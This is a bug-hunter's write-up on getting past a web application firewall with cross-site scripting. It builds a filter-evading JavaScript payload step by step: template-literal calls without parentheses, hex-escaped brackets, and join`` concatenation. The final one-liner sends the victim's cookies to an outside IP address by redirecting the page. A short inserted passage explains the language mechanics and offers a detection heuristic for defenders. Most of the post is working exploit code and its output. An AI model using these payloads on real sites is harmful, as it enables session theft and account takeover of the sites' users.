How I Bypassed a tough WAF to steal user cookies using XSS!

Finding The XSS:

test';alert(1);a='test
test';alert`1`;a='test

WAF Bypass:

alert(document.domain)
// 'www.example.com'
alert`document.domain`
// 'document.domain'
setTimeout`alert\x281\x29`
// will execute alert(1)
setTimeout`alert\x28document.domain\x29`
// will execute alert(document.domain)

Changing My Approach:

document.location="https://40.112.XX.XX/?cookies="+document.cookie;

Three characters in that payload were blocked by the WAF:

  • The forward slash → /
  • The colon → :
  • The + operator → +

Finding a way to concatenate:

  • The + Operator → which is blocked as mentioned
  • concat() → It uses the Round Brackets ( ) → blocked
  • join() → It uses the Round Brackets ( ) → blocked
['Melo', 'tover'].join('');
// 'Melotover'
['Hello', 'World'].join(' ');
// 'Hello World'
['Hello', 'World'].join(',');
// 'Hello,World'
['Melo', 'tover'].join``;
// 'Melotover'
var a = 'Find Bypass ';
var b = 'Like Melotover!';
[a, b].join``;
// 'Find Bypass Like Melotover!'
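The two tricks above (the "WAF Bypass" section's alert`document.domain` / setTimeout`alert\x281\x29` and this section's join``) rest on one language rule: a tagged template is a function call, and the tag receives an array of the literal text rather than an evaluated argument. The block below is an added example written for this note, not code from the original post; inspectTag and findTemplateCalls are hypothetical helpers, and the sample strings fed to findTemplateCalls are the post's own payloads. It runs under Node.js.

```javascript
// Added example, not code from the original post: what a tag function
// actually receives when a template literal replaces the parentheses of a call.
// inspectTag and findTemplateCalls are hypothetical helpers written for this note.

// Records exactly what JavaScript passes to a tag function.
function inspectTag(strings, ...values) {
  return {
    cooked: Array.from(strings),   // text with escape sequences already processed
    raw: Array.from(strings.raw),  // text exactly as written in the source
    values,                        // interpolated ${...} expressions, none here
    coerced: String(strings),      // what a non-tag sink sees after ToString
  };
}

// alert`document.domain`: the tag gets the literal text, not the property value,
// which is why the post saw the string 'document.domain' instead of the host name.
function literalTextCase() {
  return inspectTag`document.domain`;
}

// setTimeout`alert\x281\x29`: \x28 and \x29 are decoded in the cooked string, so a
// string-accepting sink such as the browser's setTimeout receives 'alert(1)'
// even though no '(' or ')' appeared in the request the WAF inspected.
function escapeCase() {
  return inspectTag`alert\x281\x29`;
}

// [a, b].join``: the separator argument is the strings array [''], and
// Array.prototype.join coerces it with ToString, so String(['']) === '' and the
// call behaves exactly like join('').
function joinCase() {
  const parts = ['Find Bypass ', 'Like Melotover!'];
  return {
    separatorSeen: inspectTag``.coerced,
    tagged: parts.join``,
    explicit: parts.join(''),
  };
}

// Defender's view: a filter that only blocks '(' and ')' still lets calls through.
// This heuristic lists identifiers that are invoked via a template literal, so a
// rule can treat them as call sites. It is deliberately simple: it does not
// handle nested templates or backticks inside string literals.
function findTemplateCalls(source) {
  const calls = [];
  const re = /([A-Za-z_$][\w$]*)\s*`[^`]*`/g;
  let m;
  while ((m = re.exec(source)) !== null) calls.push(m[1]);
  return calls;
}

// Stand-alone run: show each case.
console.log(literalTextCase(), escapeCase(), joinCase());
console.log(findTemplateCalls("test';alert`1`;a='test"));
```

The practical lesson for a rule writer is that parentheses are not what make JavaScript call a function; a filter has to treat identifier-followed-by-backtick as a call site as well, and a string-accepting sink (setTimeout, setInterval, the Function constructor) can still turn escaped text into code after the filter has already seen it.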

Make a valid URL:

document.location.origin
--> https://www.example.com
document.location.pathname
--> /path/name
[document.location.origin, '@40.112.xx.xx'].join``;
--> 'https://www.example.com@40.112.xx.xx'
[document.location.origin, '@40.112.xx.xx', document.cookie].join``;
--> https://www.example.com@40.112.xx.xxCookieP=value;CookieP2=value2;
[document.location.origin, '@40.112.xx.xx', document.location.pathname, document.cookie].join``;
--> https://www.example.com@40.112.xx.xx/path/nameCookieP=value;CookieP2=value2;
melo = [document.location.origin, '@40.112.xx.xx',document.location.pathname,document.cookie].join``;document.location = melo;
a=[location.origin, '@40.112.xx.xx',location.pathname,cookie].join``;location=a;

Computer Engineering Student | Bug Hunter | CTF Player | AKA Melotover
Asem Eleraky